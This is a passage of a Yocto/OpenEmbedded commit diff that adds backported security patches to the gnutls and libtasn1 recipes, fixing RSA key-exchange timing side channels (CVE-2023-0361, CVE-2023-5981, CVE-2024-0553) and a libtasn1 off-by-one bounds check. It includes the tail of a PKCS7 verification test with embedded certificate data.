++	"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\n"
++	"-----END PKCS7-----\n";
++
++const gnutls_datum_t rca_datum = { (void *)rca_pem, sizeof(rca_pem) - 1 };
++const gnutls_datum_t ca_datum = { (void *)ca_pem, sizeof(ca_pem) - 1 };
++const gnutls_datum_t ee_datum = { (void *)ee_pem, sizeof(ee_pem) - 1 };
++const gnutls_datum_t msg_datum = { (void *)msg_pem, sizeof(msg_pem) - 1 };
++
++static void tls_log_func(int level, const char *str)
++{
++	fprintf(stderr, "%s |<%d>| %s", "err", level, str);
++}
++
++#define CHECK(X)\
++{\
++	r = X;\
++	if (r < 0)\
++		fail("error in %d: %s\n", __LINE__, gnutls_strerror(r));\
++}\
++
++void doit(void)
++{
++	int r;
++	gnutls_x509_crt_t rca_cert = NULL;
++	gnutls_x509_crt_t ca_cert = NULL;
++	gnutls_x509_crt_t ee_cert = NULL;
++	gnutls_x509_trust_list_t tlist = NULL;
++	gnutls_pkcs7_t pkcs7 = NULL;
++	gnutls_datum_t data = { (unsigned char *)"xxx", 3 };
++
++	if (debug) {
++		gnutls_global_set_log_function(tls_log_func);
++		gnutls_global_set_log_level(4711);
++	}
++
++	// Import certificates
++	CHECK(gnutls_x509_crt_init(&rca_cert));
++	CHECK(gnutls_x509_crt_import(rca_cert, &rca_datum, GNUTLS_X509_FMT_PEM));
++	CHECK(gnutls_x509_crt_init(&ca_cert));
++	CHECK(gnutls_x509_crt_import(ca_cert, &ca_datum, GNUTLS_X509_FMT_PEM));
++	CHECK(gnutls_x509_crt_init(&ee_cert));
++	CHECK(gnutls_x509_crt_import(ee_cert, &ee_datum, GNUTLS_X509_FMT_PEM));
++
++	// Setup trust store
++	CHECK(gnutls_x509_trust_list_init(&tlist, 0));
++	CHECK(gnutls_x509_trust_list_add_named_crt(tlist, rca_cert, "rca", 3, 0));
++	CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ca_cert, "ca", 2, 0));
++	CHECK(gnutls_x509_trust_list_add_named_crt(tlist, ee_cert, "ee", 2, 0));
++
++	// Setup pkcs7 structure
++	CHECK(gnutls_pkcs7_init(&pkcs7));
++	CHECK(gnutls_pkcs7_import(pkcs7, &msg_datum, GNUTLS_X509_FMT_PEM));
++
++	// Signature verification
++	gnutls_pkcs7_verify(pkcs7, tlist, NULL, 0, 0, &data, 0);
++
++	gnutls_x509_crt_deinit(rca_cert);
++	gnutls_x509_crt_deinit(ca_cert);
++	gnutls_x509_crt_deinit(ee_cert);
++	gnutls_x509_trust_list_deinit(tlist, 0);
++	gnutls_pkcs7_deinit(pkcs7);
++}
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
new file mode 100644
index 0000000000..943f4ca704
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-0361.patch
@@ -0,0 +1,85 @@
+From 80a6ce8ddb02477cd724cd5b2944791aaddb702a Mon Sep 17 00:00:00 2001
+From: Alexander Sosedkin <asosedkin@redhat.com>
+Date: Tue, 9 Aug 2022 16:05:53 +0200
+Subject: [PATCH] auth/rsa: side-step potential side-channel
+
+Signed-off-by: Alexander Sosedkin <asosedkin@redhat.com>
+Signed-off-by: Hubert Kario <hkario@redhat.com>
+Tested-by: Hubert Kario <hkario@redhat.com>
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/80a6ce8ddb02477cd724cd5b2944791aaddb702a
+                           https://gitlab.com/gnutls/gnutls/-/commit/4b7ff428291c7ed77c6d2635577c83a43bbae558]
+CVE: CVE-2023-0361
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ lib/auth/rsa.c | 30 +++---------------------------
+ 1 file changed, 3 insertions(+), 27 deletions(-)
+
+diff --git a/lib/auth/rsa.c b/lib/auth/rsa.c
+index 8108ee8..858701f 100644
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -155,13 +155,10 @@ static int
+ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+		   size_t _data_size)
+ {
+-	const char attack_error[] = "auth_rsa: Possible PKCS #1 attack\n";
+	gnutls_datum_t ciphertext;
+	int ret, dsize;
+	ssize_t data_size = _data_size;
+	volatile uint8_t ver_maj, ver_min;
+-	volatile uint8_t check_ver_min;
+-	volatile uint32_t ok;
+
+ #ifdef ENABLE_SSL3
+	if (get_num_version(session) == GNUTLS_SSL3) {
+@@ -187,7 +184,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+
+	ver_maj = _gnutls_get_adv_version_major(session);
+	ver_min = _gnutls_get_adv_version_minor(session);
+-	check_ver_min = (session->internals.allow_wrong_pms == 0);
+
+	session->key.key.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+	if (session->key.key.data == NULL) {
+@@ -206,10 +202,9 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+		return ret;
+	}
+
+-	ret =
+-	    gnutls_privkey_decrypt_data2(session->internals.selected_key,
+-					 0, &ciphertext, session->key.key.data,
+-					 session->key.key.size);
++	gnutls_privkey_decrypt_data2(session->internals.selected_key,
++				     0, &ciphertext, session->key.key.data,
++				     session->key.key.size);
+	/* After this point, any conditional on failure that cause differences
+	 * in execution may create a timing or cache access pattern side
+	 * channel that can be used as an oracle, so treat very carefully */
+@@ -225,25 +220,6 @@ proc_rsa_client_kx(gnutls_session_t session, uint8_t * data,
+	 * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
+	 */
+
+-	/* ok is 0 in case of error and 1 in case of success. */
+-
+-	/* if ret < 0 */
+-	ok = CONSTCHECK_EQUAL(ret, 0);
+-	/* session->key.key.data[0] must equal ver_maj */
+-	ok &= CONSTCHECK_EQUAL(session->key.key.data[0], ver_maj);
+-	/* if check_ver_min then session->key.key.data[1] must equal ver_min */
+-	ok &= CONSTCHECK_NOT_EQUAL(check_ver_min, 0) &
+-	        CONSTCHECK_EQUAL(session->key.key.data[1], ver_min);
+-
+-	if (ok) {
+-		/* call logging function unconditionally so all branches are
+-		 * indistinguishable for timing and cache access when debug
+-		 * logging is disabled */
+-		_gnutls_no_log("%s", attack_error);
+-	} else {
+-		_gnutls_debug_log("%s", attack_error);
+-	}
+-
+	/* This is here to avoid the version check attack
+	 * discussed above.
+	 */
+--
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
new file mode 100644
index 0000000000..c518cfa0ac
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2023-5981.patch
@@ -0,0 +1,206 @@
+Backport of:
+
+From 29d6298d0b04cfff970b993915db71ba3f580b6d Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Mon, 23 Oct 2023 09:26:57 +0900
+Subject: [PATCH] auth/rsa_psk: side-step potential side-channel
+
+This removes branching that depends on secret data, porting changes
+for regular RSA key exchange from
+4804febddc2ed958e5ae774de2a8f85edeeff538 and
+80a6ce8ddb02477cd724cd5b2944791aaddb702a.  This also removes the
+allow_wrong_pms as it was used sorely to control debug output
+depending on the branching.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/gnutls28/3.6.13-2ubuntu1.9/gnutls28_3.6.13-2ubuntu1.9.debian.tar.xz
+Upstream-Commit: https://gitlab.com/gnutls/gnutls/-/commit/29d6298d0b04cfff970b993915db71ba3f580b6d]
+CVE: CVE-2023-5981
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa.c     |  2 +-
+ lib/auth/rsa_psk.c | 90 ++++++++++++++++++----------------------------
+ lib/gnutls_int.h   |  4 ---
+ lib/priority.c     |  1 -
+ 4 files changed, 35 insertions(+), 62 deletions(-)
+
+--- a/lib/auth/rsa.c
++++ b/lib/auth/rsa.c
+@@ -207,7 +207,7 @@ proc_rsa_client_kx(gnutls_session_t sess
+ 				     session->key.key.size);
+ 	/* After this point, any conditional on failure that cause differences
+ 	 * in execution may create a timing or cache access pattern side
+-	 * channel that can be used as an oracle, so treat very carefully */
++	 * channel that can be used as an oracle, so tread carefully */
+ 
+ 	/* Error handling logic:
+ 	 * In case decryption fails then don't inform the peer. Just use the
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -264,14 +264,13 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ {
+ 	gnutls_datum_t username;
+ 	psk_auth_info_t info;
+-	gnutls_datum_t plaintext;
+ 	gnutls_datum_t ciphertext;
+ 	gnutls_datum_t pwd_psk = { NULL, 0 };
+ 	int ret, dsize;
+-	int randomize_key = 0;
+ 	ssize_t data_size = _data_size;
+ 	gnutls_psk_server_credentials_t cred;
+ 	gnutls_datum_t premaster_secret = { NULL, 0 };
++	volatile uint8_t ver_maj, ver_min;
+ 
+ 	cred = (gnutls_psk_server_credentials_t)
+ 	    _gnutls_get_cred(session, GNUTLS_CRD_PSK);
+@@ -327,71 +326,47 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_se
+ 	}
+ 	ciphertext.size = dsize;
+ 
+-	ret =
+-	    gnutls_privkey_decrypt_data(session->internals.selected_key, 0,
+-					&ciphertext, &plaintext);
+-	if (ret < 0 || plaintext.size != GNUTLS_MASTER_SIZE) {
+-		/* In case decryption fails then don't inform
+-		 * the peer. Just use a random key. (in order to avoid
+-		 * attack against pkcs-1 formatting).
+-		 */
+-		gnutls_assert();
+-		_gnutls_debug_log
+-		    ("auth_rsa_psk: Possible PKCS #1 format attack\n");
+-		if (ret >= 0) {
+-			gnutls_free(plaintext.data);
+-		}
+-		randomize_key = 1;
+-	} else {
+-		/* If the secret was properly formatted, then
+-		 * check the version number.
+-		 */
+-		if (_gnutls_get_adv_version_major(session) !=
+-		    plaintext.data[0]
+-		    || (session->internals.allow_wrong_pms == 0
+-			&& _gnutls_get_adv_version_minor(session) !=
+-			plaintext.data[1])) {
+-			/* No error is returned here, if the version number check
+-			 * fails. We proceed normally.
+-			 * That is to defend against the attack described in the paper
+-			 * "Attacking RSA-based sessions in SSL/TLS" by Vlastimil Klima,
+-			 * Ondej Pokorny and Tomas Rosa.
+-			 */
+-			gnutls_assert();
+-			_gnutls_debug_log
+-			    ("auth_rsa: Possible PKCS #1 version check format attack\n");
+-		}
+-	}
++	ver_maj = _gnutls_get_adv_version_major(session);
++	ver_min = _gnutls_get_adv_version_minor(session);
+ 
++	premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
++	if (premaster_secret.data == NULL) {
++		gnutls_assert();
++		return GNUTLS_E_MEMORY_ERROR;
++	}
++	premaster_secret.size = GNUTLS_MASTER_SIZE;
+ 
+-	if (randomize_key != 0) {
+-		premaster_secret.size = GNUTLS_MASTER_SIZE;
+-		premaster_secret.data =
+-		    gnutls_malloc(premaster_secret.size);
+-		if (premaster_secret.data == NULL) {
+-			gnutls_assert();
+-			return GNUTLS_E_MEMORY_ERROR;
+-		}
+-
+-		/* we do not need strong random numbers here.
+-		 */
+-		ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+-				  premaster_secret.size);
+-		if (ret < 0) {
+-			gnutls_assert();
+-			goto cleanup;
+-		}
+-	} else {
+-		premaster_secret.data = plaintext.data;
+-		premaster_secret.size = plaintext.size;
++	/* Fallback value when decryption fails. Needs to be unpredictable. */
++	ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
++			 premaster_secret.size);
++	if (ret < 0) {
++		gnutls_assert();
++		goto cleanup;
+ 	}
+ 
++	gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
++				     &ciphertext, premaster_secret.data,
++				     premaster_secret.size);
++	/* After this point, any conditional on failure that cause differences
++	 * in execution may create a timing or cache access pattern side
++	 * channel that can be used as an oracle, so tread carefully */
++
++	/* Error handling logic:
++	 * In case decryption fails then don't inform the peer. Just use the
++	 * random key previously generated. (in order to avoid attack against
++	 * pkcs-1 formatting).
++	 *
++	 * If we get version mismatches no error is returned either. We
++	 * proceed normally. This is to defend against the attack described
++	 * in the paper "Attacking RSA-based sessions in SSL/TLS" by
++	 * Vlastimil Klima, Ondej Pokorny and Tomas Rosa.
++	 */
++
+ 	/* This is here to avoid the version check attack
+ 	 * discussed above.
+ 	 */
+-
+-	premaster_secret.data[0] = _gnutls_get_adv_version_major(session);
+-	premaster_secret.data[1] = _gnutls_get_adv_version_minor(session);
++	premaster_secret.data[0] = ver_maj;
++	premaster_secret.data[1] = ver_min;
+ 
+ 	/* find the key of this username
+ 	 */
+--- a/lib/gnutls_int.h
++++ b/lib/gnutls_int.h
+@@ -989,7 +989,6 @@ struct gnutls_priority_st {
+ 	bool _no_etm;
+ 	bool _no_ext_master_secret;
+ 	bool _allow_key_usage_violation;
+-	bool _allow_wrong_pms;
+ 	bool _dumbfw;
+ 	unsigned int _dh_prime_bits;	/* old (deprecated) variable */
+ 
+@@ -1007,7 +1006,6 @@ struct gnutls_priority_st {
+ 	      (x)->no_etm = 1; \
+ 	      (x)->no_ext_master_secret = 1; \
+ 	      (x)->allow_key_usage_violation = 1; \
+-	      (x)->allow_wrong_pms = 1; \
+ 	      (x)->dumbfw = 1
+ 
+ #define ENABLE_PRIO_COMPAT(x) \
+@@ -1016,7 +1014,6 @@ struct gnutls_priority_st {
+ 	      (x)->_no_etm = 1; \
+ 	      (x)->_no_ext_master_secret = 1; \
+ 	      (x)->_allow_key_usage_violation = 1; \
+-	      (x)->_allow_wrong_pms = 1; \
+ 	      (x)->_dumbfw = 1
+ 
+ /* DH and RSA parameters types.
+@@ -1141,7 +1138,6 @@ typedef struct {
+ 	bool no_etm;
+ 	bool no_ext_master_secret;
+ 	bool allow_key_usage_violation;
+-	bool allow_wrong_pms;
+ 	bool dumbfw;
+ 
+ 	/* old (deprecated) variable. This is used for both srp_prime_bits
+--- a/lib/priority.c
++++ b/lib/priority.c
+@@ -681,7 +681,6 @@ gnutls_priority_set(gnutls_session_t ses
+ 	COPY_TO_INTERNALS(no_etm);
+ 	COPY_TO_INTERNALS(no_ext_master_secret);
+ 	COPY_TO_INTERNALS(allow_key_usage_violation);
+-	COPY_TO_INTERNALS(allow_wrong_pms);
+ 	COPY_TO_INTERNALS(dumbfw);
+ 	COPY_TO_INTERNALS(dh_prime_bits);
+ 
diff --git a/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
new file mode 100644
index 0000000000..f15c470879
--- /dev/null
+++ b/meta/recipes-support/gnutls/gnutls/CVE-2024-0553.patch
@@ -0,0 +1,125 @@
+From 40dbbd8de499668590e8af51a15799fbc430595e Mon Sep 17 00:00:00 2001
+From: Daiki Ueno <ueno@gnu.org>
+Date: Wed, 10 Jan 2024 19:13:17 +0900
+Subject: [PATCH] rsa-psk: minimize branching after decryption
+
+This moves any non-trivial code between gnutls_privkey_decrypt_data2
+and the function return in _gnutls_proc_rsa_psk_client_kx up until the
+decryption.  This also avoids an extra memcpy to session->key.key.
+
+Signed-off-by: Daiki Ueno <ueno@gnu.org>
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/gnutls/-/commit/40dbbd8de499668590e8af51a15799fbc430595e]
+CVE: CVE-2024-0553
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/auth/rsa_psk.c | 68 ++++++++++++++++++++++++----------------------
+ 1 file changed, 35 insertions(+), 33 deletions(-)
+
+diff --git a/lib/auth/rsa_psk.c b/lib/auth/rsa_psk.c
+index 93c2dc9..c6cfb92 100644
+--- a/lib/auth/rsa_psk.c
++++ b/lib/auth/rsa_psk.c
+@@ -269,7 +269,6 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ 	int ret, dsize;
+ 	ssize_t data_size = _data_size;
+ 	gnutls_psk_server_credentials_t cred;
+-	gnutls_datum_t premaster_secret = { NULL, 0 };
+ 	volatile uint8_t ver_maj, ver_min;
+ 
+ 	cred = (gnutls_psk_server_credentials_t)
+@@ -329,24 +328,48 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ 	ver_maj = _gnutls_get_adv_version_major(session);
+ 	ver_min = _gnutls_get_adv_version_minor(session);
+ 
+-	premaster_secret.data = gnutls_malloc(GNUTLS_MASTER_SIZE);
+-	if (premaster_secret.data == NULL) {
++	/* Find the key of this username. A random value will be
++	 * filled in if the key is not found.
++	 */
++	ret = _gnutls_psk_pwd_find_entry(session, info->username,
++			                 strlen(info->username), &pwd_psk);
++	if (ret < 0)
++		return gnutls_assert_val(ret);
++
++	/* Allocate memory for premaster secret, and fill in the
++	 * fields except the decryption result.
++	 */
++	session->key.key.size = 2 + GNUTLS_MASTER_SIZE + 2 + pwd_psk.size;
++	session->key.key.data = gnutls_malloc(session->key.key.size);
++	if (session->key.key.data == NULL) {
+ 		gnutls_assert();
++		_gnutls_free_key_datum(&pwd_psk);
++		/* No need to zeroize, as the secret is not copied in yet */
++		_gnutls_free_datum(&session->key.key);
+ 		return GNUTLS_E_MEMORY_ERROR;
+ 	}
+-	premaster_secret.size = GNUTLS_MASTER_SIZE;
+ 
+ 	/* Fallback value when decryption fails. Needs to be unpredictable. */
+-	ret = gnutls_rnd(GNUTLS_RND_NONCE, premaster_secret.data,
+-			 premaster_secret.size);
++	ret = gnutls_rnd(GNUTLS_RND_NONCE, session->key.key.data + 2,
++			 GNUTLS_MASTER_SIZE);
+ 	if (ret < 0) {
+ 		gnutls_assert();
+-		goto cleanup;
++		_gnutls_free_key_datum(&pwd_psk);
++		/* No need to zeroize, as the secret is not copied in yet */
++		_gnutls_free_datum(&session->key.key);
++		return ret;
+ 	}
+ 
++	_gnutls_write_uint16(GNUTLS_MASTER_SIZE, session->key.key.data);
++	_gnutls_write_uint16(pwd_psk.size,
++			     &session->key.key.data[2 + GNUTLS_MASTER_SIZE]);
++	memcpy(&session->key.key.data[2 + GNUTLS_MASTER_SIZE + 2], pwd_psk.data,
++	       pwd_psk.size);
++	_gnutls_free_key_datum(&pwd_psk);
++
+ 	gnutls_privkey_decrypt_data2(session->internals.selected_key, 0,
+-				     &ciphertext, premaster_secret.data,
+-				     premaster_secret.size);
++				     &ciphertext, session->key.key.data + 2,
++				     GNUTLS_MASTER_SIZE);
+ 	/* After this point, any conditional on failure that cause differences
+ 	 * in execution may create a timing or cache access pattern side
+ 	 * channel that can be used as an oracle, so tread carefully */
+@@ -365,31 +388,10 @@ _gnutls_proc_rsa_psk_client_kx(gnutls_session_t session, uint8_t * data,
+ 	/* This is here to avoid the version check attack
+ 	 * discussed above.
+ 	 */
+-	premaster_secret.data[0] = ver_maj;
+-	premaster_secret.data[1] = ver_min;
++	session->key.key.data[2] = ver_maj;
++	session->key.key.data[3] = ver_min;
+ 
+-	/* find the key of this username
+-	 */
+-	ret =
+-	    _gnutls_psk_pwd_find_entry(session, info->username, strlen(info->username), &pwd_psk);
+-	if (ret < 0) {
+-		gnutls_assert();
+-		goto cleanup;
+-	}
+-
+-	ret =
+-	    set_rsa_psk_session_key(session, &pwd_psk, &premaster_secret);
+-	if (ret < 0) {
+-		gnutls_assert();
+-		goto cleanup;
+-	}
+-
+-	ret = 0;
+-      cleanup:
+-	_gnutls_free_key_datum(&pwd_psk);
+-	_gnutls_free_temp_key_datum(&premaster_secret);
+-
+-	return ret;
++	return 0;
+ }
+ 
+ static int
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/gnutls_3.6.14.bb b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
index 51578b4b3b..a1451daf2c 100644
--- a/meta/recipes-support/gnutls/gnutls_3.6.14.bb
+++ b/meta/recipes-support/gnutls/gnutls_3.6.14.bb
@@ -1,5 +1,7 @@
 SUMMARY = "GNU Transport Layer Security Library"
-HOMEPAGE = "http://www.gnu.org/software/gnutls/"
+DESCRIPTION = "a secure communications library implementing the SSL, \
+TLS and DTLS protocols and technologies around them."
+HOMEPAGE = "https://gnutls.org/"
 BUGTRACKER = "https://savannah.gnu.org/support/?group=gnutls"
 
 LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -21,6 +23,13 @@ SRC_URI = "https://www.gnupg.org/ftp/gcrypt/gnutls/v${SHRT_VER}/gnutls-${PV}.tar
            file://arm_eabi.patch \
            file://0001-Modied-the-license-to-GPLv2.1-to-keep-with-LICENSE-f.patch \
            file://CVE-2020-24659.patch \
+           file://CVE-2021-20231.patch \
+           file://CVE-2021-20232.patch \
+           file://CVE-2022-2509.patch \
+           file://CVE-2021-4209.patch \
+           file://CVE-2023-0361.patch \
+           file://CVE-2023-5981.patch \
+           file://CVE-2024-0553.patch \
 "
 
 SRC_URI[sha256sum] = "5630751adec7025b8ef955af4d141d00d252a985769f51b4059e5affa3d39d63"
diff --git a/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
new file mode 100644
index 0000000000..9a8ceecbe7
--- /dev/null
+++ b/meta/recipes-support/gnutls/libtasn1/CVE-2021-46848.patch
@@ -0,0 +1,45 @@
+From 22fd12b290adea788122044cb58dc9e77754644f Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Thu, 17 Nov 2022 12:07:50 +0530
+Subject: [PATCH] CVE-2021-46848
+
+Upstream-Status: Backport [https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5]
+CVE: CVE-2021-46848
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+Fix ETYPE_OK off by one array size check.
+---
+ NEWS      | 4 ++++
+ lib/int.h | 2 +-
+ 2 files changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/NEWS b/NEWS
+index f042481..d8f684e 100644
+--- a/NEWS
++++ b/NEWS
+@@ -1,5 +1,9 @@
+ GNU Libtasn1 NEWS                                     -*- outline -*-
+ 
++* Noteworthy changes in release ?.? (????-??-??) [?]
++- Fix ETYPE_OK out of bounds read.  Closes: #32.
++- Update gnulib files and various maintenance fixes.
++
+ * Noteworthy changes in release 4.16.0 (released 2020-02-01) [stable]
+ - asn1_decode_simple_ber: added support for constructed definite
+   octet strings. This allows this function decode the whole set of
+diff --git a/lib/int.h b/lib/int.h
+index ea16257..c877282 100644
+--- a/lib/int.h
++++ b/lib/int.h
+@@ -97,7 +97,7 @@ typedef struct tag_and_class_st
+ #define ETYPE_TAG(etype) (_asn1_tags[etype].tag)
+ #define ETYPE_CLASS(etype) (_asn1_tags[etype].class)
+ #define ETYPE_OK(etype) (((etype) != ASN1_ETYPE_INVALID && \
+-                          (etype) <= _asn1_tags_size && \
++			   (etype) < _asn1_tags_size && \
+                           _asn1_tags[(etype)].desc != NULL)?1:0)
+ 
+ #define ETYPE_IS_STRING(etype) ((etype == ASN1_ETYPE_GENERALSTRING || \
+-- 
+2.25.1
+
diff --git a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
index 8337b70241..d2b3c492ec 100644
--- a/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
+++ b/meta/recipes-support/gnutls/libtasn1_4.16.0.bb
@@ -1,4 +1,6 @@
 SUMMARY = "Library for ASN.1 and DER manipulation"
+DESCRIPTION = "A highly portable C library that encodes and decodes \
+DER/BER data following an ASN.1 schema. "
 HOMEPAGE = "http://www.gnu.org/software/libtasn1/"
 
 LICENSE = "GPLv3+ & LGPLv2.1+"
@@ -10,6 +12,7 @@ LIC_FILES_CHKSUM = "file://doc/COPYING;md5=d32239bcb673463ab874e80d47fae504 \
 
 SRC_URI = "${GNU_MIRROR}/libtasn1/libtasn1-${PV}.tar.gz \
            file://dont-depend-on-help2man.patch \
+           file://CVE-2021-46848.patch \
            "
 
 DEPENDS = "bison-native"
diff --git a/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
new file mode 100644
index 0000000000..1c46684c6d
--- /dev/null
+++ b/meta/recipes-support/gpgme/gpgme/0001-use-closefrom-on-linux-and-glibc-2.34.patch
@@ -0,0 +1,24 @@
